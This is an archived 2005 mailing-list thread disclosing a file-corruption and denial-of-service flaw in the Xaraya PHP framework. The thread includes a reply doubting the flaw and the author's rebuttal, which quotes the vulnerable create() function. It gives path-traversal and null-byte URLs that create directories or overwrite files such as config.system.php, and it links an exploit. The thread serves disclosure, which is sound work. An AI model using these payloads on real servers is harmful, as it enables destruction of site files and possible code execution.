Xaraya <= 1.0.0 RC4 D.O.S / file corruption [Archief]

Bekijk Volledige Versie : Xaraya <= 1.0.0 RC4 D.O.S / file corruption

retrogod@aliceposta.it

30/11/05, 04:30

Xaraya <= 1.0.0 RC4 D.O.S / file corruption

software:
site: http://www.xaraya.com
description: "Xaraya 1.0 Core is an Open Source web application framework
written in PHP"

vulnerable code in create() function in xarMLSXML2PHPBackend.php:

i) you can create an empty dir, in some cases this leads to D.O.S. condition,poc:

http://[target]/[path_to_xaraya]/index.php?module=../../../../.key.php
http://[target]/[path_to_xaraya]/index.php?module=../../../../../.htaccess

ii) you can overwite any file on target system, using null char

example, D.O.S, overwriting a system file:

http://[target]/[path_to_xaraya]/index.php?module=../../../../config.system.php%00

this could lead to remode code execution condition even, if a user overwrite
some file where an inclusion path is defined

rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/xaraya1DOS.hmtl

Paul Laudanski

30/11/05, 20:45

On 29 Nov 2005 retrogod@aliceposta.it wrote:

> Xaraya <= 1.0.0 RC4 D.O.S / file corruption
>
> software:
> site: http://www.xaraya.com
> description: "Xaraya 1.0 Core is an Open Source web application framework
> written in PHP"
> i) you can create an empty dir, in some cases this leads to D.O.S. condition,poc:
>
> http://[target]/[path_to_xaraya]/index.php?module=../../../../.key.php
> http://[target]/[path_to_xaraya]/index.php?module=../../../../../.htaccess

Being that Xaraya is a fork from Post nuke which is a fork off PHP Nuke
the input would already have been checked for directory traversal among
other things.

--
Paul Laudanski, Microsoft MVP Windows-Security
[de] http://de.castlecops.com
[en] http://castlecops.com
[wiki] http://wiki.castlecops.com

retrogod@securityfocus.com, at@securityfocus.com,

01/12/05, 00:00

it's not an inclusion bug, it is an fopen()/file corruption bug, this is the vulnerable code in xarMLSXML2PHPBackend.php:
....
function create($ctxType, $ctxName)
{
assert('!empty($this->baseDir)');
assert('!empty($this->baseXMLDir)');
$this->fileName = $this->baseDir;
$this->xmlFileName = $this->baseXMLDir;

if (!ereg("^[a-z]+:$", $ctxType)) {
list($prefix,$directory) = explode(':',$ctxType);
if ($directory != "") {
$this->fileName .= $directory . "/";
$this->xmlFileName .= $directory . "/";
}
}

$dirForMkDir = $this->fileName;
if (!file_exists($dirForMkDir)) xarMLS__mkdirr($dirForMkDir, 0777);

$this->fileName .= $ctxName . ".php";
$this->xmlFileName .= $ctxName . ".xml";

$xmlFileExists = false;
if (file_exists($this->xmlFileName)) {
if (!($fp1 = fopen($this->xmlFileName, "r"))) {
xarLogMessage("Could not open XML input: ".$this->xmlFileName);
}
$data = fread($fp1, filesize($this->xmlFileName));
fclose($fp1);
$xml_parser = xml_parser_create();
xml_parse_into_struct($xml_parser, $data, $vals, $index);
xml_parser_free($xml_parser);
$xmlFileExists = true;
} else {
xarLogMessage("MLS Could not find XML input: ".$this->xmlFileName);
}

$fp2 = @fopen ($this->fileName, "w" );
if ($fp2 !== false) {
fputs($fp2, '<?php'."\n");
fputs($fp2, 'global $xarML_PHPBackend_entries;'."\n");
fputs($fp2, 'global $xarML_PHPBackend_keyEntries;'."\n");
if ($xmlFileExists) {
foreach ($vals as $node) {
if (!array_key_exists('tag',$node)) continue;
if (!array_key_exists('value',$node)) $node['value'] = '';
if ($node['tag'] == 'STRING') {
$node['value'] = str_replace('\'', '\\\'', $node['value']);
$start = '$xarML_PHPBackend_entries[\''.$node['value']."']";
} elseif ($node['tag'] == 'KEY') {
$node['value'] = str_replace('\'', '\\\'', $node['value']);
$start = '$xarML_PHPBackend_keyEntries[\''.$node['value']."']";
} elseif ($node['tag'] == 'TRANSLATION') {
if ($this->outCharset != 'utf-8') {
$node['value'] = $GLOBALS['xarMLS_newEncoding']->convert($node['value'], 'utf-8', $this->outCharset, 0);
}
$node['value'] = str_replace('\'', '\\\'', $node['value']);
if (!empty($node['value'])) {
fputs($fp2, $start . " = '".$node['value']."';\n");
}
}
}
}
fputs($fp2, "?>");
fclose($fp2);
} else {
xarLogMessage("Could not create file: ".$this->fileName);
global $xarML_PHPBackend_entries;
global $xarML_PHPBackend_keyEntries;
if ($xmlFileExists) {
foreach ($vals as $node) {
if (!array_key_exists('tag',$node)) continue;
if (!array_key_exists('value',$node)) $node['value'] = '';
if ($node['tag'] == 'STRING') {
$node['value'] = str_replace('\'', '\\\'', $node['value']);
$entryIndex = $node['value'];
$entryType = 'string';
} elseif ($node['tag'] == 'KEY') {
$node['value'] = str_replace('\'', '\\\'', $node['value']);
$entryIndex = $node['value'];
$entryType = 'key';
} elseif ($node['tag'] == 'TRANSLATION') {
if ($this->outCharset != 'utf-8') {
$node['value'] = $GLOBALS['xarMLS_newEncoding']->convert($node['value'], 'utf-8', $this->outCharset, 0);
}
$node['value'] = str_replace('\'', '\\\'', $node['value']);
if ($entryType == 'string') {
$xarML_PHPBackend_entries[$entryIndex] = $node['value'];
} elseif ($entryType == 'key') {
$xarML_PHPBackend_keyEntries[$entryIndex] = $node['value'];
}
}
}
}
}

return true;
}
}
?>

however, this is my proof of cocept exploit:

http://www.milw0rm.com/id.php?id=1345